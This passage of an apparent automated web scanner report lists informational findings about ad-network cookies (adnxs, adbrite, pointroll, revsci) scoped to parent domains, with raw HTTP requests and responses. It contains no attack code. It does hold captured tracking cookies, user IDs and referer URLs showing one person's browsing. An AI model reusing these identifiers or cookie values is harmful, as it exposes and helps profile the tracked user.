h2d3TaTYML11pzoZIlFkYCIGVGm_tUjxVd7495aTWd8W1uYfsa9nlK9dyZVYIz5pmDpzdU80QQkZpM_cVFXYTcTTPOspL-TBLfO2ZZ5wOsMI8xMfjrvrnuyo8Yez2B_AzlVUYglieXXogFqezIO3vueH6XrbdeOZqLTJ2eUC5VtOBQseHiE81nClsShNFF0lz8B3FOROwHTKbP2IH89nbviHBnlpbRDDco7mBS3_DJ0ZnqsKZKeTVpjW22ISOFg-eZ4nuypVotMax7cw1A0lomZOewLLuUzHWvz6IKIMXKnKL80iX025NYG1qkKS0O8LGs7luRUbTpMVbMDENDpvIJh2_kOeZwWW0-b-WJf0ZFlMOgj84vlCimF9cP6eLyeThS4cELoZF7hIMY-yiS6od8aiwiVy6K8hyJ0-yKCmYc6DEnkoIDjLUURQ9jCbj0adNONAbHq6OIauKDPsVyaYkWyAz1a3QLsZ0HFEk9FUwZlIZoC4PKchFMfXO25PtkA1FJuDF1eIqRRk7NbH_3KXaXpegXdoohM0M5HiSWAEvqit8JfBxvjBBCecmNOFvmnxZXlybKUM3qIhRpr8zAond1hyHy2KCxQ9jRTaSUh9q8NAYC-8-qkSZEZsmx23qKVCrqZDyeipaIi4-WrfUh7IPblkcEwLIfWk4JnPVlR_zGm4PPqzfx4-ZPuIxR87K17SR-59M9UpIVvIMltY5lVfKu7zjIgIpMBKB2P8TaeZb5SMS1Kn2fJf0-MGZW4U9vWHTndk9ZYnTYKRbzB2AW8sPYtx1gLnWIDsYBLT8b4yTE_t-fjXYNBuH2MTsqi1WP1f5naPDjKNVGGv49osHpNOU5hR-g_XrO60jJc9MudtXKgUybYsjSwmSw3Whqt4otLu1R9f4pMroY6TrnX9AFtcCOq4KtB3OqN2gLia6NWPazuloW1Dp_gmgtfmkSSGnmz7Ck--msIbUItDCaX4V_0YzpDgobT5myGAQ1jpLDCI7HiZjNNO0_95EX9SUHeo0SvSjgEUZJK2gWAKmardOPRrryF1DhECcp1-YMQnoV4ZAArTQ0YurxnNN6cMRpOMh2nE5XzpH9jU_75X6gaFQNyuWz4EiPqighnBW1K7ySrDy2erbCyocIlO9iKCeGUvo-FRYRZN7b2HzshKpWim7EvVYj9LxNPbnlLRl7SF6Fz-Cqk4ilR2m1sd6XpoV6J-HdTmFEl8Fex_S_sTGaqkuGDnpWV_Epn14CgCD-1Od2j93-G993DJLn6laQk0A_YEjXCNxN4ufXJe2s8taXVc1ZwCaKwQ-ReuFBa_BvA0MPyd7JlyBvMOrx4RsY1dMYwNR_ohNoy9a29HQKTTBeSdexy7NjxMrQdbG848mPsvXEVp1Zp9tlw0PafTHwRamGgGanwtSRVH2wEa3NxSTCsrM00Brun6QttnrZ4i40yYFMUM2IND36b7ZFw4; fc=qPpK4X8K7ZjxVx0VJZDcdB_D1mN3lHI_BinJ1LdrOAbDh9xILOy7cWXWYifPzZ3iZjzoSdlEeqq3zCQrton2D32iD1a2418t8vlUtDGalV-JhisFugd5-2PmgEb-dzYcx_84B0Gt7iZQiKNqGC2CofHgZs6hnwrt4AvKtyKV8klPR1hRXEWvUhiTNhz33U4d9hTEpcCaiTjdUImk_rGRYl95QzLPGgcS4PLuvzPSDFoeX72gpvVoMR_dT1IU83itQkcPCNDBJR1s8ojl7c8L5k9KWBxjpL-6lYKR74fQmyE; pf=WmCQSJv_88YAF1TaCEjacvtFyKtKd3nkimHPVBGJrCArW05u4B9BwnHxy5LHSNbs0PyvhiQ9hEGFvp1qMvxzBcdiicNNmmE_aI2n_-oR-aRG9eqUO6PdyPlHytyWBeL6pt4N9d3OY-Qo6M3zGftguNTbm-VGCKrn7KG61o8a-hlxQgbL-MXnxJnxbWK81XM2fNbwnskl80J7FrpArydV4msv5xJnc6wiNkkgoc9ZHAqEvAXfc_b9CYsOLM4ObfRS-yQ0IxDS6yGV0bt0Oz4pJzQ3Hu9GorHJq3pkzhhXE4dM0xncvVUD6tMlnnlm_qWsojASvNxNlCtZvel71OhRg1_acYxwuGBwWmnpT3WVNmeWKUlZO7GlHHuYkG_xUYpdlRr7vUCIaoiDaMmpt_PvLCOUyLGtO0hHJuwGY5T09JX2RCeAmas1by9-2jjXtHbxIU6XTk6RPEnQXT9x2zEmWfAeEJZ2W4XMeMQpqzhWB_34UH3sPqU14UWUW_0z8Z0heNyepssmwJo9AEHB3dcHG8NqNopQF7bmOYrUClo2LIAxUFIqqMfzF-f5IilV9DF2EEtf1qwB8GY1P6ISMC2NEE-NukVybOAFf3snxZsusnThrdw025CqgpXbAJf_ZgK04z5LE7vpNsVQaepPKy5giom1bq2yFvVGruUD-0Zmu_IOz-UlYiPBN7JyoSoKGJwMowB-sj_YCAwsoyO3MSAriA-6SvpE8vfm17M_AiAxw4nAd1Y9GjRixW8BKZaPBicaTSnQ_qW1THdHtsDrSOwE7yWjUosqwui97JSt4J0g_MOMd0ReLIPTEksHwzd4gYkpoMm2n6Nulr0bAVvGt4WcZWdCKTjb3Ww3q4Lyh_VyGMuPK371XlXjo5X46eVqRbV699MOJ5eDdshYLSs5LFoOgILjO_vdFh0XnPmUquTICkH1HrsiJSZNWOX0SyN8dywaeYYZUTlRetsuBzMcxMWLQLNyiRU1bJ5Qpb7GomgPhXBwcMjXa09KP5HzekSxDcQK0SJw0JMmSyeQM3pYTVx-Ci-FU5aKfMy17HNvPHxNvxNrRXY1izURX-lyALi1AlxuBXTDiJUS-OqKWjm2DD4CuggKG3dUzHMmu04fSX5Ad4nEc6NlGzZLMuoExgCCt30kp2pmOmYcQYMZyZ05DubgihMl8PJOwcr8ldScAKqk7rGGnUh27gMWCyrnP1Di5AGzTucfcXTrqV1UJKyBhGxFYcQFai9M2J3rqJmFUgQdN5ATDIRwfK3uozaJUKhU4qVipaL_GD-TOTelik5DYCvXIYIInb3nfIa-ebQa7olHWWH486R4yxje4LN8GWCWWRe4IR0I9DtTjuVzRJkyZ8n66XpUPlCRi3tlvuMEH6BKrtjGsUA2wOoIXFuaM_JUwMHDgab4_aPrZdgl9Uf7tvD9rgyRTxnR6YKNm8Gu6ALXRmCYGTIP8i-wsqx8QkqNgi0F_hs9UZaVZDpy-HyTAsx-Y51cz4yJITcb0FaAWC4QbaWSbbOECFNVbSmOiTVVH4eEKD1WvX5M7UplxrzwIhN9Mwkgo1sMiNanUUl1UyNj_Qxjp4iBCha2ShvDZxpY4-NTPO_cWHxychz2AkV4XXIJ0g; uid=2931142961646634775; rrs=1%7C2%7C3%7C4%7C1002%7C6%7C7%7C7%7C9%7C1001%7C1006%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7C1007%7C1008; rds=15093%7C15093%7C15093%7C15104%7C15085%7C15097%7C15097%7C15082%7C15093%7C15093%7C15091%7C15093%7C15093%7C15093%7Cundefined%7C15093%7Cundefined%7C15097%7C15093; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Sat, 05-Nov-2011 14:00:03 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:02 GMT
Content-Length: 336

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=2819581112640559492&fpid=12&nu=n&t
...[SNIP]...
9.7. http://admeld.adnxs.com/usersync  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /usersync?calltype=admeld&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQQy-af7gQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfw)(Hcd2V-98k^bd*F+<znTL2]8%/jHD=5GIablQaj1T:+`)zrd1=majNg:ONjO>+82L6e*h.`=y@ao43RDO58T![k)6!=WY9w/>LgC0ua]n^t9r7oLP9_MR@8bPbEM847ea^)aQDU!K8:8Mib6U0k<hxzjjc[Au-0<H<LXM#U5[eZ^afi8c^pVP+AZX@q#/1Yqvbtbx4+dqj`fk[s:L()qUlmtKi<9%GO3-N#?aXT5?1fj<hBx)/6Z@XtG.bxqYY)ts/akPQP2zii]#7P.g2Q_sE9Gz4:Dy)!/w1/x6[P]Eqz?pW%7>6Mwdg]0aq`?CM8*+L5fjlMlfBgN+A'YarJt+k/-ctwQ^Uq-P<*PApFh(RhKd*E6R]:CYB02[GzruJZ?an)NJ`vwQv>AW.v4iD:)aFh_y<`>^2lo$qk8$w+Ytq`ut.@:47cEgPirxft1)9PZ`[aV<=%*'4ao'@v@CMN'*.1GQ4dz.</o#@qpnB8>5[3h/Bt1dKrd6[glkJgTQ($k9''V5?XzRTik7Bs=T:e?z(RgMdLBBv=7H7j/W:X6Kx[EHFW>3riVr9(#PFxXdrMKvO`+qJ_t(SwiD!=%5^x+$H=Zk']d3xQ_@d[

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 14:00:15 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:00:15 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Mon, 09 May 2011 14:00:15 GMT
Content-Length: 155

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=193&external_user_id=2724386019227846218&expiration=0" width="0" height="0"/>');
9.8. http://ads.adbrite.com/adserver/vdi/742697  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/742697

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/742697?d=2931142961646634775 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8532944041141139446&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb=0:682865:20838240:null:0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:712156:20861280:xrd52zkwjuxh:0:742697:20828160:2931142961646634775:0:753292:20858400:AM-00000000030620452:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:779045:20861280:17647108006034089:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0:810647:21077280:549188a1-a07c-4231-be94-7f725e1a19f7:0:830697:20838240:9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC:0; b="%3A%3Axews%2Clln4%2Cllra%2Cx4co%2Cx4cn%2Cx4cw%2C12gg8%2C12ggb%2C6e73"; rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo0CgY2ODQzMzkY5Y3LuQsiJDRkYWI3ZDM1LWIxZDItOTE1YS1kM2MwLTlkNTdmOWM2NmIwNwo0CgY3MTEzODQYiP7KzRMiJGMxZTEzMDFlLTNhMWYtNGNhNy05ODcwLWY2MzZiNWYxMGU2NgocCgY3MTIxNTYY6Nv74xMiDHhyZDUyemt3anV4aAojCgY3NDI2OTcY8rjOrAwiEzI5MzExNDI5NjE2NDY2MzQ3NzUKJAoGNzUzMjkyGNCZ6o0TIhRBTS0wMDAwMDAwMDAzMDYyMDQ1Mgo2CgY3NjI3MDEQhJaVmQoYpNGM7RMiIDk3ODk3MkRGQTA2MzAwMEQyQzBFN0EzODBCRkExREVDCiEKBjc3OTA0NRjPwZngEyIRMTc2NDcxMDgwMDYwMzQwODkKFgoGNzgyNjA2EIC7iqMKGICT7M0TIgAKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUKNAoGODEwNjQ3GMnBh4REIiQ1NDkxODhhMS1hMDdjLTQyMzEtYmU5NC03ZjcyNWUxYTE5ZjcKMAoGODMwNjk3GIvXg80OIiA5UVF4Y1RPNXVIMklhN0JrNHZHUzJTOTZ1Zk9Hc1NEQxAB; ut="1%3AXZFJtsIgEEX3wjgDGtMcdxMEE35oQhNzorh3AX88xumtW6%2Bq4AFuGJwfYOLbahzz4AzcKtUSkVW%2BbSOKsMrAZzC3rIDLOHaDhf0tQTkEFXGklRdCk2xRWNoi%2BptgdnU94ToM7xJPLmaVteS%2BJtIRJxNB9e5dzcHbqTpQL7mUidCwmtjGhpKPqH%2FaZSO25pQpg4ss2%2FuJhDlrVqOy6EmZtKhTRpfhlnX%2FV5ZIUR9n95j1%2Be6x8%2B8zF5MysXcpbN6uWsdURuG%2BvxLHuX%2BEw1do016%2BQ0EFaK81d6J8AHg%2BXw%3D%3D"; fq="7l04r%2C1uo0%7Clkjpsr%2C80kpw%2C1uo0%7Clkkjk6%2C86xtm%2C1uo0%7Clkkk10%2C86egg%2C1uo0%7Clkkk0s%2C873x5%2C1uo0%7Clkkz7b%2C8721s%2C1uo0%7Clkkjgh%7Clkkjhg%7Clkkjhn%7Clkkjhq%7Clkkjk1%2C83ol2%2C1uo0%7Clkjpss%2C826ke%2C1uo0%7Clkjpsr%2C84y2m%2C1uo0%7Clkjpt2%2C8413g%2C1uo0%7Clkl4dq%2C86eg6%2C1uo0%7Clkkk0h%2C86xsv%2C1uo0%7Clkkjk7%7Clkkjke%7Clkkjkh%7Clkkz71"

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 09 May 2011 14:00:11 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: srh="1%3Aq64FAA%3D%3D"; path=/; domain=.adbrite.com; expires=Tue, 10-May-2011 14:00:11 GMT
Set-Cookie: rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo0CgY3MTEzODQYiP7KzRMiJGMxZTEzMDFlLTNhMWYtNGNhNy05ODcwLWY2MzZiNWYxMGU2NgocCgY3MTIxNTYY6Nv74xMiDHhyZDUyemt3anV4aAojCgY3NDI2OTcYm9WOzw4iEzI5MzExNDI5NjE2NDY2MzQ3NzUKJAoGNzUzMjkyGNCZ6o0TIhRBTS0wMDAwMDAwMDAzMDYyMDQ1Mgo2CgY3NjI3MDEQhJaVmQoYpNGM7RMiIDk3ODk3MkRGQTA2MzAwMEQyQzBFN0EzODBCRkExREVDCiEKBjc3OTA0NRjPwZngEyIRMTc2NDcxMDgwMDYwMzQwODkKFgoGNzgyNjA2EIC7iqMKGICT7M0TIgAKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUKNAoGODEwNjQ3GMnBh4REIiQ1NDkxODhhMS1hMDdjLTQyMzEtYmU5NC03ZjcyNWUxYTE5ZjcKMAoGODMwNjk3GIvXg80OIiA5UVF4Y1RPNXVIMklhN0JrNHZHUzJTOTZ1Zk9Hc1NEQxAB; path=/; domain=.adbrite.com; expires=Sun, 07-Aug-2011 14:00:11 GMT
Set-Cookie: ut="1%3AXZDJloMgEEX%2FhbULhiie%2FI0EokQGGRKPCfn3Bjr2ib293Ee9qhd4YHB%2BgVlsq%2FU8gDPwq9L3hJwOlCaUYFNAKGChvILLNPWjg8MjQzVGnXBiTZDSkGIxWGMJ3WZYXNPOuI3j75PILuaNc%2BS5ZtITrzJB7e5d7cHbqT7QoIRSmbC42kRTx8ifaP7FVSe37lQoh3dV24eZxKVozqBa9KRtLuq1NXW44%2F1ny%2FqlbI%2BzcfA5tmxXY9KQEIrP%2FR4CF3OC41e8o5fvOGgAG4wRXtZTg%2Ff7Bw%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 06-May-2021 14:00:11 GMT
Set-Cookie: vsd=0@1@4dc7f36b@cdn.turn.com; path=/; domain=.adbrite.com; expires=Wed, 11-May-2011 14:00:11 GMT
Set-Cookie: fq=; path=/; domain=.adbrite.com; expires=Mon, 09-May-2011 14:00:11 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
9.9. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PortalServe/?pid=1291095E86820110502141346&flash=10&time=1|8:59|-5&redir=http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/w%3B240293018%3B0-0%3B1%3B63773644%3B4986-300/600%3B42004857/42022644/1%3Bu%3D%2Ccm-87971011_1304949578%2C11f8f328940989e%2Cent%2Cax.-cm.ent_l-cm.music_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-idgt.careers_l%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-87971011_1304949578%2C11f8f328940989e%2Cent%2Cax.-cm.ent_l-cm.music_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-idgt.careers_l%3B%3Btgt%3Dbrand%3Bcmw%3Dowl%3Bsz%3D300x600%3Bnet%3Dcm%3Bord1%3D680525%3Bcontx%3Dent%3Ban%3D%3Bdc%3Dw%3Bbtg%3Dcm.ent_l%3Bbtg%3Dcm.music_h%3Bbtg%3Dti.aal%3Bbtg%3Dbz.25%3Bbtg%3Ddx.16%3Bbtg%3Ddx.23%3Bbtg%3Ddx.17%3Bbtg%3Drt.truecredit2%3Bbtg%3Dqc.ae%3Bbtg%3Dqc.ac%3Bbtg%3Didgt.careers_l%3B%7Eaopt%3D2/1/e454/0%3B%7Esscs%3D%3f$CTURL$&r=0.22781705926172435 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRvt=CEJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eonlg6HlnAEZCAeJozEon0qBOtv!FLBCe; PRgo=BCBAAsJvCAAuILCBF-19!BCVBF4FR; PRimp=7DA20400-C8FF-C732-0209-A310000A0200; PRca=|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:10|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#; PRcp=|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:1|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#; PRpl=|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#; PRcr=|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:1|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 13:59:43 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 11740
Set-Cookie:PRvt=CFJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eonlg6HlnAEZCAeJozEon0qBOtv!FLBCeJpJEothAY0aKAxsCAe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BCBAAsJvCAAuILCBF-19!BCVBF4FR;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=D8A20400-6340-8A46-0309-A4900C6C0200; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKRD*2017:1|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:10|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKRDAA67:1|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:1|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GMjB:1|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:1|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
9.10. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=I10982 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decdd4f&0&&4dc619e1&271d956a153787d6fee9112e9c6a9326; 